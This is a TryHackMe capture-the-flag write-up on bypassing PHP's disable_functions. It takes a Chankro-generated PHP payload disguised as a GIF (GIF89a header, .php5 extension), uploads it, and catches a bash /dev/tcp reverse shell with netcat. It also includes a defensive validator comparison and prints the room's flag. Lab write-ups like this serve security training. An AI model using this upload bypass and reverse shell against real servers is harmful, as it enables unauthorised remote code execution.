TryHackMe - Bypass Disable Functions

Bypass Disable Functions by Vuk Markovic

This CTF is built around a file upload vulnerability: we are going to craft a malicious PHP script, disguise it as a GIF, and upload it to the target web server.

Several related weaknesses fall under the same family:

  • Lack of file-type validation --> the application does not properly verify the type of an uploaded file (extension, MIME type, content), so a script can be stored where it will later be executed
  • No file size limit --> the application accepts uploads without enforcing a maximum size, which opens the door to denial of service or disk/resource exhaustion
  • Insufficient validation --> the application checks the upload superficially (for example only the extension, or only the first few bytes), so a crafted file passes the check and enables actions the author never intended

So if we can get the web server to store our file and then request it, the PHP interpreter will run it and we get remote code execution. The twist this room is named after is that PHP's disable_functions directive blocks the usual command-execution functions (system(), exec(), shell_exec() and friends), so a plain web shell is not enough; that is where Chankro comes in.

Chankro:

Let's start by downloading Chankro, the tool that does the heavy lifting in this CTF. Chankro bypasses disable_functions by writing a shared library and your payload into a directory the web server can write to (the --path argument, which is why we need the document root later), setting LD_PRELOAD to that library with putenv(), and then calling a PHP function such as mail() that spawns a child process; the child loads the library and runs your payload without ever calling a disabled function.

Link --> https://github.com/TarlogicSecurity/Chankro

Installation:

  • git clone https://github.com/TarlogicSecurity/Chankro.git
  • cd Chankro
  • chmod +x chankro.py
  • python2 chankro.py --help

GoBuster:

Before we do anything with Chankro, let's run gobuster to brute-force directories and files on the web server and see what we get:

gobuster dir -u http://IP -w /usr/share/wordlists/dirb/common.txt

Once gobuster finishes, two results are worth a look:

  • /assets/js/ --> Hint: read the client-side form validator to see which extensions and content checks the upload form applies (client-side checks can be bypassed, but they tell you what the server probably expects too)
  • /phpinfo.php --> Hint: find DOCUMENT_ROOT (the absolute path Chankro needs) and, while you are there, note the disable_functions line, which is the restriction we are about to bypass

Chankro Reverse Shell:

Chankro takes a shell script as input and wraps it in the PHP payload, so first we write the reverse shell as a script (in mousepad or any editor):

  • Create a new file and type in the command:
  • /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/1234 0>&1'
  • Save the file with a .sh extension (for example rev.sh), replacing YOUR_IP with your attacking machine's IP

Next we generate the PHP payload from inside the Chankro directory:

  • python2 chankro.py --arch 64 --input NAME_OF_.SH_FILE --output NAME_THAT_YOU_GIVE.php5 --path DOCUMENT_ROOT (the path you read from phpinfo.php, which must be writable by the web server)
  • A new .php5 file is created. The .php5 extension is used because the upload form rejects .php (see the form validator hint above), while the server still hands .php5 files to the PHP interpreter
  • To get it past the content check we also make it look like a GIF, so open the generated file in mousepad:
  • At the very top of the script, before the <?php tag, add the following line:
  • GIF89a;
  • Save the file and exit. The file now starts with the GIF magic bytes, which is all a naive content check looks at, while the PHP code after it is untouched
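To make the bypass above concrete, here is an added example (not code from the room, from Chankro, or from the author) that puts a naive upload validator beside a stricter one and runs both over constructed sample uploads. The room's real form validator is not reproduced; the deny-list, the legacy PHP handler extension list and the sample file contents are all assumptions chosen to illustrate the GIF89a + .php5 trick.

```python
"""Naive vs. strict upload validation for the GIF89a + .php5 disguise.

Added illustration only: the validators and sample uploads below are
assumptions, not the TryHackMe room's real code or Chankro's output.
"""
import os
import secrets

GIF_MAGIC = (b"GIF87a", b"GIF89a")

# Extensions that a legacy Apache "AddHandler application/x-httpd-php ..."
# line commonly maps to the PHP interpreter (assumed config, for illustration).
LEGACY_PHP_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml")

# Constructed sample uploads: (client-supplied filename, file body).
HONEST_GIF = ("cat.gif", b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 8 + b";")
DISGUISED_PAYLOAD = (
    "shell.php5",
    b"GIF89a;\n<?php /* stand-in for the chankro-generated payload */ putenv('LD_PRELOAD=/tmp/x.so'); ?>",
)
PLAIN_PHP = ("shell.php", b"<?php system($_GET['c']); ?>")


def naive_validator(filename: str, data: bytes) -> bool:
    """Weak check: deny-list a couple of extensions, then trust the magic bytes.

    This is exactly what a GIF89a header plus a .php5 extension walks past:
    '.php5' is not on the deny-list and the body *starts* like a GIF.
    """
    denied = (".php", ".phtml")
    if filename.lower().endswith(denied):
        return False
    return data.startswith(GIF_MAGIC)


def strict_validator(filename: str, data: bytes) -> bool:
    """Allow-list the extension, require the magic bytes, and refuse any body
    that also carries a PHP open tag anywhere, not just at offset 0."""
    _, ext = os.path.splitext(filename.lower())
    if ext != ".gif":
        return False
    if not data.startswith(GIF_MAGIC):
        return False
    if b"<?php" in data or b"<?=" in data:
        return False
    return True


def served_as_php(filename: str, handled_exts=LEGACY_PHP_EXTS) -> bool:
    """Would the web server hand this filename to the PHP interpreter?

    Shows why the deny-list in naive_validator() is insufficient: the set of
    extensions PHP executes is wider than the set the validator blocks.
    """
    return filename.lower().endswith(tuple(handled_exts))


def safe_storage_name(filename: str) -> str:
    """Discard the client-supplied name: keep only the allow-listed extension
    and use a random basename, so an upload cannot be requested by a name the
    attacker chose (store it outside DOCUMENT_ROOT as well)."""
    _, ext = os.path.splitext(filename.lower())
    if ext != ".gif":
        raise ValueError("extension not allowed")
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name, body in (HONEST_GIF, DISGUISED_PAYLOAD, PLAIN_PHP):
        print(f"{name:12} naive={naive_validator(name, body)!s:5} "
              f"strict={strict_validator(name, body)!s:5} php={served_as_php(name)}")
```

The disguised payload passes naive_validator() while served_as_php() says the server would still execute it; strict_validator() rejects it on the extension alone and would also catch a .gif that smuggles a PHP tag. Note that none of this touches disable_functions: once a PHP file executes, that directive only limits which functions it can call, and Chankro's LD_PRELOAD route shows it is not a security boundary on its own.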

Final Preparations:

From the Chankro directory, start a netcat listener on the port you put in the reverse shell script:

  • nc -lvnp 1234

Now go to the web page and upload the .php5 file.

Once the upload succeeds, browse to:

  • IP/uploads

You will see your file listed there. Click on it (requesting the file is what makes PHP execute it); the Chankro payload runs your script and the reverse shell should connect back to your listener.

Once the session is established, navigate to /home on the target, then into the s4vi directory, and list its contents; flag.txt is there:

  • cat flag.txt
  • thm{bypass_d1sable_functions_1n_php}

And we got our flag ;D